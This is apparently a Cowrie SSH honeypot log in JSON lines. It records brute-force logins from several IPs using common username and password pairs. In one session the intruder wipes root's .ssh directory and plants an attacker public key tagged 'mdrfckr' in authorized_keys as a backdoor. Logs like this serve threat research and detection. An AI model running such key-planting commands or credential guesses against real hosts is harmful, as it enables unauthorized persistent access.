{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":45386,"dst_ip":"1.2.3.4","dst_port":22,"session":"517bad8d2f7b","protocol":"ssh","message":"New connection: 77.75.56.63:45386 (1.2.3.4:22) [session: 517bad8d2f7b]","sensor":"my-vps","timestamp":"2025-09-08T20:22:42.846403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:22:42.847500Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:22:42.888131Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test1234@","message":"login attempt [root/Test1234@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.079736Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:22:43.228141Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.228795Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.229522Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.273710Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:22:43.407340Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.408159Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.445056Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.445969Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":45392,"dst_ip":"1.2.3.4","dst_port":22,"session":"09101c429ff0","protocol":"ssh","message":"New connection: 77.75.56.63:45392 (1.2.3.4:22) [session: 09101c429ff0]","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.490887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.491640Z","src_ip":"77.75.56.63","session":"09101c429ff0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.531766Z","src_ip":"77.75.56.63","session":"09101c429ff0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:22:43.774081Z","src_ip":"77.75.56.63","session":"09101c429ff0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:22:44.815729Z","src_ip":"77.75.56.63","session":"09101c429ff0"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":54796,"dst_ip":"1.2.3.4","dst_port":22,"session":"4024ab2db6c5","protocol":"ssh","message":"New connection: 77.75.56.63:54796 (1.2.3.4:22) [session: 4024ab2db6c5]","sensor":"my-vps","timestamp":"2025-09-08T20:22:44.874247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:22:44.875304Z","src_ip":"77.75.56.63","session":"4024ab2db6c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:22:44.933505Z","src_ip":"77.75.56.63","session":"4024ab2db6c5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:22:45.209976Z","src_ip":"77.75.56.63","session":"4024ab2db6c5"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:22:45.247988Z","src_ip":"77.75.56.63","session":"517bad8d2f7b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:22:45.257484Z","src_ip":"77.75.56.63","session":"4024ab2db6c5"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":39200,"dst_ip":"1.2.3.4","dst_port":22,"session":"affbd520336b","protocol":"ssh","message":"New connection: 216.107.136.92:39200 (1.2.3.4:22) [session: affbd520336b]","sensor":"my-vps","timestamp":"2025-09-08T20:23:19.655986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:23:19.656849Z","src_ip":"216.107.136.92","session":"affbd520336b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:23:19.756377Z","src_ip":"216.107.136.92","session":"affbd520336b"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"abc123","message":"login attempt [hammer/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:23:20.195533Z","src_ip":"216.107.136.92","session":"affbd520336b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:23:21.298208Z","src_ip":"216.107.136.92","session":"affbd520336b"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":44012,"dst_ip":"1.2.3.4","dst_port":22,"session":"5519e92310e7","protocol":"ssh","message":"New connection: 77.75.56.63:44012 (1.2.3.4:22) [session: 5519e92310e7]","sensor":"my-vps","timestamp":"2025-09-08T20:23:54.308702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:23:54.309633Z","src_ip":"77.75.56.63","session":"5519e92310e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:23:54.348236Z","src_ip":"77.75.56.63","session":"5519e92310e7"}
{"eventid":"cowrie.login.failed","username":"default","password":"password123","message":"login attempt [default/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:23:54.533790Z","src_ip":"77.75.56.63","session":"5519e92310e7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:23:55.571822Z","src_ip":"77.75.56.63","session":"5519e92310e7"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":54368,"dst_ip":"1.2.3.4","dst_port":22,"session":"98ef862cc5e9","protocol":"ssh","message":"New connection: 103.206.72.2:54368 (1.2.3.4:22) [session: 98ef862cc5e9]","sensor":"my-vps","timestamp":"2025-09-08T20:23:56.972449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:23:56.975774Z","src_ip":"103.206.72.2","session":"98ef862cc5e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:23:57.146896Z","src_ip":"103.206.72.2","session":"98ef862cc5e9"}
{"eventid":"cowrie.login.failed","username":"ahmed","password":"Password123","message":"login attempt [ahmed/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:23:57.837636Z","src_ip":"103.206.72.2","session":"98ef862cc5e9"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:23:59.015703Z","src_ip":"103.206.72.2","session":"98ef862cc5e9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60934,"dst_ip":"1.2.3.4","dst_port":22,"session":"b14276bc95f3","protocol":"ssh","message":"New connection: 217.72.205.35:60934 (1.2.3.4:22) [session: b14276bc95f3]","sensor":"my-vps","timestamp":"2025-09-08T20:24:08.336555Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:24:08.337740Z","src_ip":"217.72.205.35","session":"b14276bc95f3"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":54894,"dst_ip":"1.2.3.4","dst_port":22,"session":"68af18f7eac0","protocol":"ssh","message":"New connection: 77.75.56.63:54894 (1.2.3.4:22) [session: 68af18f7eac0]","sensor":"my-vps","timestamp":"2025-09-08T20:25:00.967551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:25:00.969942Z","src_ip":"77.75.56.63","session":"68af18f7eac0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:25:01.012360Z","src_ip":"77.75.56.63","session":"68af18f7eac0"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"password123","message":"login attempt [gpadmin/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:25:01.180057Z","src_ip":"77.75.56.63","session":"68af18f7eac0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:02.230504Z","src_ip":"77.75.56.63","session":"68af18f7eac0"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":33164,"dst_ip":"1.2.3.4","dst_port":22,"session":"a061226059b6","protocol":"ssh","message":"New connection: 216.107.136.92:33164 (1.2.3.4:22) [session: a061226059b6]","sensor":"my-vps","timestamp":"2025-09-08T20:25:02.832753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:25:02.833566Z","src_ip":"216.107.136.92","session":"a061226059b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:25:02.924132Z","src_ip":"216.107.136.92","session":"a061226059b6"}
{"eventid":"cowrie.login.failed","username":"elk","password":"password1","message":"login attempt [elk/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T20:25:03.327423Z","src_ip":"216.107.136.92","session":"a061226059b6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:25:04.420474Z","src_ip":"216.107.136.92","session":"a061226059b6"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":47746,"dst_ip":"1.2.3.4","dst_port":22,"session":"528e4df0630e","protocol":"ssh","message":"New connection: 103.206.72.2:47746 (1.2.3.4:22) [session: 528e4df0630e]","sensor":"my-vps","timestamp":"2025-09-08T20:25:16.256299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:25:16.257056Z","src_ip":"103.206.72.2","session":"528e4df0630e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 